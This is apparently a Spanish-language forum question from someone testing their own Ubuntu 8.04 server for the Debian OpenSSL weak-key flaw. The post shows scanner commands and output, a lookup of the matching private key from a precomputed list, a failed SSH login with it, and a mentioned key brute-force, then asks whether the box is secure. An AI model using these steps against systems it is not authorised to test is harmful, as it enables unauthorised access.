DESCARGO DE RESPONSABILIDAD: El cuadro vulnerable que estamos probando nos pertenece, y todas las acciones están bajo vigilancia, por lo que no estamos haciendo nada ilegal aquí.
Estoy probando una caja de Ubuntu 8.04, se sabe que tiene una vulnerabilidad de claves débiles de OpenSSL . El script proporcionado por Debian confirmó que el servidor es vulnerable:
$ perl dowkd.pl host X.X.X.X
X.X.X.X: weak key (OpenSSH/dsa/1024)
X.X.X.X: weak key (OpenSSH/rsa/2048)
summary: keys found: 2, weak keys: 2
Luego uso otro script proporcionado por enlace llamado debian_ssh_scan_v4.py para encontrar la huella digital y la clave pública / privada correspondiente.
$ python debian_ssh_scan_v4.py X.X.X.X
X.X.X.X:22 sshd fingerprint 4795d53ae413531f78f4d45bbd6eb929 VULNERABLE (RSA 2048 bit key, pid 26571)
$ find rsa/2048/4795d53ae413531f78f4d45bbd6eb929*
rsa/2048/4795d53ae413531f78f4d45bbd6eb929-26571
rsa/2048/4795d53ae413531f78f4d45bbd6eb929-26571.pub
La clave privada (bajo rsa / 2048 ) se obtiene de la lista de claves posibles: enlace
Sin embargo, no pude iniciar sesión en el cuadro vuln utilizando la clave encontrada (tenga en cuenta que ubuntu es un usuario válido en ese cuadro):
$ ssh -i rsa/2048/4795d53ae413531f78f4d45bbd6eb929-26571 -o PasswordAuthentication=no [email protected]
Public key 47:95:d5:3a:e4:13:53:1f:78:f4:d4:5b:bd:6e:b9:29 blacklisted (see ssh-vulnkey(1)); continuing anyway
Permission denied (publickey,password).
También intenté aplicar bruteforce todas las claves posibles (que extraje del archivo comprimido) utilizando secuencia de comandos de WarCat y ninguna de las claves pudo autenticarse.
Con todos esos resultados, ¿podría decir que la caja es segura y dice que en realidad no es vulnerable a la debilidad de la clave OpenSSL?